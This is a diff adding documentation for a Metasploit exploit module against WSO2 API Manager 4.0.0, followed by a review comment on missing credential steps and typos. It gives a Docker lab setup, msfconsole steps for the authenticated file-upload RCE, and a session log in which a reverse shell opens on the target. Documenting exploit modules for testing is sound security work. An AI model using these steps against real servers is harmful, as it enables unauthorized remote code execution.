| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +A vulnerability in the 'Add API Documentation' feature allows malicious users with specific permissions |
| 4 | +(`/permission/admin/login` and `/permission/admin/manage/api/publish`) to upload arbitrary files to a user-controlled |
| 5 | +server location. This flaw could be exploited to execute remote code, enabling an attacker to gain control over the server. |
| 6 | + |
| 7 | +```yaml |
| 8 | +services: |
| 9 | + api-manager: |
| 10 | + image: wso2/wso2am:4.0.0-alpine |
| 11 | + container_name: swo2_api_manager |
| 12 | + ports: |
| 13 | + - "9443:9443" |
| 14 | + |
| 15 | +``` |
| 16 | + |
| 17 | +```bash |
| 18 | +docker-compose up |
| 19 | +``` |
| 20 | +## Verification Steps |
| 21 | + |
| 22 | +1. Install the application |
| 23 | +1. Start msfconsole |
| 24 | +1. Do: `use multi/http/wso2_api_manager_file_upload_rce` |
| 25 | +1. Do: `set rhosts [ip]` |
| 26 | +1. Do: `set lhost [ip]` |
| 27 | +1. Do: `run` |
| 28 | +1. You should get a shell. |
| 29 | + |
| 30 | +## Scenarios |
| 31 | + |
| 32 | +### WSO2 API Manager 4.0.0 |
| 33 | +``` |
| 34 | +msf6 exploit(multi/http/wso2_api_manager_file_upload_rce) > exploit |
| 35 | +
|
| 36 | +[*] Started reverse TCP handler on 0.0.0.0:4444 |
| 37 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 38 | +[*] Checking target... |
| 39 | +[+] Authentication successful |
| 40 | +[+] The target appears to be vulnerable. Detected WSO2 API Manager 4.0.0 which is vulnerable. |
| 41 | +[+] Authentication successful |
| 42 | +[*] Listing APIs... |
| 43 | +[+] Document created successfully |
| 44 | +[*] Uploading payload... |
| 45 | +[+] Payload uploaded successfully |
| 46 | +[*] Executing payload... |
| 47 | +[+] Payload executed successfully |
| 48 | +[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:58206) at 2024-11-03 15:36:37 +0100 |
| 49 | +
|
| 50 | +id |
| 51 | +uid=802(wso2carbon) gid=802(wso2) groups=802(wso2) |
| 52 | +pwd |
| 53 | +/home/wso2carbon/wso2am-4.0.0 |
| 54 | +exit |
| 55 | +[*] 127.0.0.1 - Command shell session 2 closed. |
| 56 | +``` |
| 57 | + |
| 58 | +## Options |
| 59 | + |
| 60 | +### HttpUsername (required) |
| 61 | + |
| 62 | +The username to authenticate with. |
| 63 | + |
| 64 | +### HttpPassword (required) |
| 65 | + |
| 66 | +The password of the user to authenticate with. |
| 67 | + |
| 68 | +### RHOSTS (required) |
| 69 | + |
| 70 | +The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html |
| 71 | + |
| 72 | +### RPORT (required) |
| 73 | + |
| 74 | +The target port (TCP) |
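Review bot: the Verification Steps never set `HttpUsername` and `HttpPassword`, yet the Options section lists both as required and the Scenarios output begins with "Authentication successful", so a reader following steps 1-7 as written will not get past authentication; add `1. Do: \`set HttpUsername [user]\`` and `1. Do: \`set HttpPassword [password]\`` before `run`, and state that the account must hold the `/permission/admin/login` and `/permission/admin/manage/api/publish` permissions named in the Vulnerable Application section. Two smaller points in the same file: the `container_name` in the compose block reads `swo2_api_manager` (transposed `wso2`), and the Scenarios heading is not separated from its fenced block by a blank line, which breaks rendering in some markdown viewers.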